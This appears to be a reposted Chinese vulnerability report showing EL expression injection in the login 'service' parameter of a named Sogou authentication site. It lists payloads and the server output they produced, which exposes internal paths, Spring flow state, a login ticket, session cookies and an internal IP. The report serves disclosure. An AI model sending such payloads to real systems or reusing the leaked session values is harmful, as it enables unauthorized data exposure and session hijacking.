当前位置: 开发笔记 > 编程语言 > 正文

javael表达式_JAVAWEBEL表达式注入

作者：手机用户2502939977 | 来源：互联网 | 2023-05-31 16:30

#1漏洞地址code区域https:auth.p4p.sogou.comlogin?service${1000-900}code区域https:auth.p4p.sogou.com

#1 漏洞地址

code 区域

https://auth.p4p.sogou.com/login?service&＃61;${1000-900}

code 区域

https://auth.p4p.sogou.com/login?service&＃61;${pageContext}

action&＃61;"/login?service&＃61;com.caucho.jsp.PageContextImpl&＃64;2aaf3a58" method&＃61;"post">

#2 表达式执行后的结果返回在页面

获取web路径

${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

file:/opt/local/resin/

code 区域

https://auth.p4p.sogou.com/login?service&＃61;${requestScope}

{javax.servlet.jsp.jstl.fmt.locale&＃61;zh_CN, org.springframework.validation.BindingResult.credentials&＃61;org.springframework.webflow.mvc.view.BindingModel: 0 errors, flashScope&＃61;map[[empty]], flowExecutionUrl&＃61;/login?service&＃61;%5BLjava.lang.String%3B%40660b2cde, warnCOOKIEValue&＃61;false, javax.servlet.forward.servlet_path&＃61;/login, org.springframework.web.servlet.support.RequestContext.CONTEXT&＃61;Flow ApplicationContext [login]: startup date [Tue Apr 12 21:38:02 CST 2016]; parent: WebApplicationContext for namespace &＃39;eunomia-servlet&＃39;, org.springframework.web.servlet.DispatcherServlet.THEME_SOURCE&＃61;WebApplicationContext for namespace &＃39;eunomia-servlet&＃39;: startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, caucho.forward&＃61;true, javax.servlet.forward.request_uri&＃61;/login, javax.servlet.forward.query_string&＃61;service&＃61;${requestScope}, loginTicket&＃61;LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m, javax.servlet.forward.context_path&＃61;, phoneValidationModel&＃61;com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel&＃64;2da91c3c, org.springframework.web.servlet.FlashMapManager.OUTPUT_FLASH_MAP&＃61;[Attributes&＃61;{}, targetRequestPath&＃61;null, targetRequestParams&＃61;{}], flowRequestContext&＃61;[RequestControlContextImpl&＃64;4bab0382 externalContext &＃61; org.springframework.webflow.mvc.servlet.MvcExternalContext&＃64;4873729d, currentEvent &＃61; viewAcountLogin, requestScope &＃61; map[[empty]], attributes &＃61; map[[empty]], messageContext &＃61; [DefaultMessageContext&＃64;1369c694 sourceMessages &＃61; map[[null] -> list[[empty]]]], flowExecution &＃61; [FlowExecutionImpl&＃64;56c2881 flow &＃61; &＃39;login&＃39;, flowSessions &＃61; list[[FlowSessionImpl&＃64;7fd72fee flow &＃61; &＃39;login&＃39;, state &＃61; &＃39;accountViewLoginForm&＃39;, scope &＃61; map[&＃39;phoneValidationModel&＃39; -> com.sogou.bizdev.eunomia.validation.phone.PhoneValidationModel&＃64;2da91c3c, &＃39;loginTicket&＃39; -> &＃39;LT-16293-w2RJq4zIVtOY04HWxDFFgagPRy271m&＃39;, &＃39;service&＃39; -> ${requestScope}, &＃39;credentials&＃39; -> [username: null], &＃39;warnCOOKIEValue&＃39; -> false, &＃39;ticketGrantingTicketId&＃39; -> [null], &＃39;viewScope&＃39; -> map[&＃39;commandName&＃39; -> &＃39;credentials&＃39;]]]]]], viewScope&＃61;map[&＃39;commandName&＃39; -> &＃39;credentials&＃39;], javax.servlet.jsp.jstl.fmt.localizationContext&＃61;org.springframework.web.servlet.support.JstlUtils$SpringLocalizationContext&＃64;88bf3d4, org.springframework.web.servlet.DispatcherServlet.LOCALE_RESOLVER&＃61;org.springframework.web.servlet.i18n.COOKIELocaleResolver&＃64;1c34e7ae, org.springframework.web.servlet.DispatcherServlet.CONTEXT&＃61;WebApplicationContext for namespace &＃39;eunomia-servlet&＃39;: startup date [Tue Apr 12 21:37:56 CST 2016]; parent: Root WebApplicationContext, org.springframework.web.servlet.DispatcherServlet.THEME_RESOLVER&＃61;org.jasig.cas.services.web.ServiceThemeResolver&＃64;55565ef9, flowExecutionKey&＃61;e110s1, service&＃61;${requestScope}, commandName&＃61;credentials, encodingFilter.FILTERED&＃61;true, credentials&＃61;[username: null]}

code 区域

https://auth.p4p.sogou.com/login?service&＃61;${header}

{Upgrade-Insecure-Requests&＃61;1, Accept-Language&＃61;zh-CN,zh;q&＃61;0.8,en;q&＃61;0.6,zh-TW;q&＃61;0.4, COOKIE&＃61;SUV&＃61;1446734204911570; IPLOC&＃61;CN4401; SUID&＃61;BA5782774FC80D0A00000000563B6987; pgv_pvi&＃61;3484909568; sct&＃61;4; LSTMV&＃61;703%2C260; LCLKINT&＃61;108193; CXID&＃61;5CE9FE68778002DCEC30C2A9412EBA10; GOTO&＃61;; ad&＃61;3wENElllll2Q7p51lllllVtpqM7lllllNcJUWlllll9lllllxTDll5&＃64;&＃64;&＃64;&＃64;&＃64;&＃64;&＃64;&＃64;&＃64;&＃64;; _euid&＃61;75841017-9d86-4069-9421-d077bd8489ef; JSESSIONID&＃61;abcN1iKReDhPacJcOLoqv; session_id_agent_crm&＃61;8a089ef7-44bf-493b-81bc-45a327cf03ec, Host&＃61;auth.p4p.sogou.com, PROXY_ADDR&＃61;10.149.29.104, Accept-Encoding&＃61;gzip, deflate, sdch, X-Real-IP&＃61;119.130.85.119, X-Forwarded-For&＃61;*******, User-Agent&＃61;, Connection&＃61;close, Accept&＃61;text/html,application/xhtml&＃43;xml,application/xml;q&＃61;0.9,image/webp,*/*;q&＃61;0.8}

推荐阅读

java
springmvc学习笔记(十)：控制器业务方法中通过注解实现封装Javabean接收表单提交的数据

本文介绍了在springmvc学习笔记系列的第十篇中，控制器的业务方法中如何通过注解实现封装Javabean来接收表单提交的数据。同时还讨论了当有多个注册表单且字段完全相同时，如何将其交给同一个控制器处理。 ... [详细]

蜡笔小新 2023-12-13 12:16:34
java
java 线程死锁模拟

1，关于死锁的理解死锁，我们可以简单的理解为是两个线程同时使用同一资源，两个线程又得不到相应的资源而造成永无相互等待的情况。 2，模拟死锁背景介绍：我们创建一个朋友 ... [详细]

蜡笔小新 2023-12-13 19:12:25
java
OC学习笔记之@property和@synthesize

本文介绍了OC学习笔记中的@property和@synthesize，包括属性的定义和合成的使用方法。通过示例代码详细讲解了@property和@synthesize的作用和用法。 ... [详细]

蜡笔小新 2023-12-14 12:05:06
import
django视图函数的使用方法

本文介绍了django中视图函数的使用方法，包括如何接收Web请求并返回Web响应，以及如何处理GET请求和POST请求。同时还介绍了urls.py和views.py文件的配置方式。 ... [详细]

蜡笔小新 2023-12-12 16:02:59
java
AJAX的POST请求及实现数据修改功能的方法

本文介绍了使用AJAX的POST请求实现数据修改功能的方法。通过ajax-post技术，可以实现在输入某个id后，通过ajax技术调用post.jsp修改具有该id记录的姓名的值。文章还提到了AJAX的概念和作用，以及使用async参数和open()方法的注意事项。同时强调了不推荐使用async=false的情况，并解释了JavaScript等待服务器响应的机制。 ... [详细]

蜡笔小新 2023-12-14 16:12:01
java
Java实战之电影在线观看系统的实现

本文介绍了Java实战之电影在线观看系统的实现过程。首先对项目进行了简述，然后展示了系统的效果图。接着介绍了系统的核心代码，包括后台用户管理控制器、电影管理控制器和前台电影控制器。最后对项目的环境配置和使用的技术进行了说明，包括JSP、Spring、SpringMVC、MyBatis、html、css、JavaScript、JQuery、Ajax、layui和maven等。 ... [详细]

蜡笔小新 2023-12-14 15:52:03
java
Hibernate基础映射

在说Hibernate映射前，我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象，以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]

蜡笔小新 2023-12-14 10:57:47
java
Spring特性实现接口多类的动态调用详解

本文详细介绍了如何使用Spring特性实现接口多类的动态调用。通过对Spring IoC容器的基础类BeanFactory和ApplicationContext的介绍，以及getBeansOfType方法的应用，解决了在实际工作中遇到的接口及多个实现类的问题。同时，文章还提到了SPI使用的不便之处，并介绍了借助ApplicationContext实现需求的方法。阅读本文，你将了解到Spring特性的实现原理和实际应用方式。 ... [详细]

蜡笔小新 2023-12-14 03:24:19
java
关于cuowu类的错误提示和使用AdjustmentListener的问题

本文讨论了一个关于cuowu类的问题，作者在使用cuowu类时遇到了错误提示和使用AdjustmentListener的问题。文章提供了16个解决方案，并给出了两个可能导致错误的原因。 ... [详细]

蜡笔小新 2023-12-13 22:09:56
jsp
后台获取视图对应的字符串

1.帮助类后台获取视图对应的字符串publicclassViewHelper{将View输出为字符串(注：不会执行对应的ac ... [详细]

蜡笔小新 2023-12-13 18:03:01
import
在重复造轮子的情况下用ProxyServlet反向代理来减少工作量

像不少公司内部不同团队都会自己研发自己工具产品，当各个产品逐渐成熟，到达了一定的发展瓶颈，同时每个产品都有着自己的入口，用户 ... [详细]

蜡笔小新 2023-12-13 15:19:01
java
VB.NET在线急等问题解决方法，如何统计数据库字段下的数据并显示在文本框里？

本文介绍了一个在线急等问题解决方法，即如何统计数据库中某个字段下的所有数据，并将结果显示在文本框里。作者提到了自己是一个菜鸟，希望能够得到帮助。作者使用的是ACCESS数据库，并且给出了一个例子，希望得到的结果是560。作者还提到自己已经尝试了使用"select sum(字段2) from 表名"的语句，得到的结果是650，但不知道如何得到560。希望能够得到解决方案。 ... [详细]

蜡笔小新 2023-12-13 15:15:30
java
猜字母游戏

猜字母游戏猜字母游戏——设计数据结构猜字母游戏——设计程序结构猜字母游戏——实现字母生成方法猜字母游戏——实现字母检测方法猜字母游戏——实现主方法1猜字母游戏——设计数据结构1.1 ... [详细]

蜡笔小新 2023-12-13 12:04:03
java
org.apache.catalina.LifecycleEvent类的使用及代码示例

标题： ... [详细]

蜡笔小新 2023-12-13 11:03:10
java
javaweb多图片打包下载，弹出提示框问题_html/css_WEBITnose

在springmvc框架中，前台ajax调用方法，对图片批量下载，如何弹出提示保存位置选框？Controller方法 ... [详细]

蜡笔小新 2023-12-12 14:56:31

手机用户2502939977

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章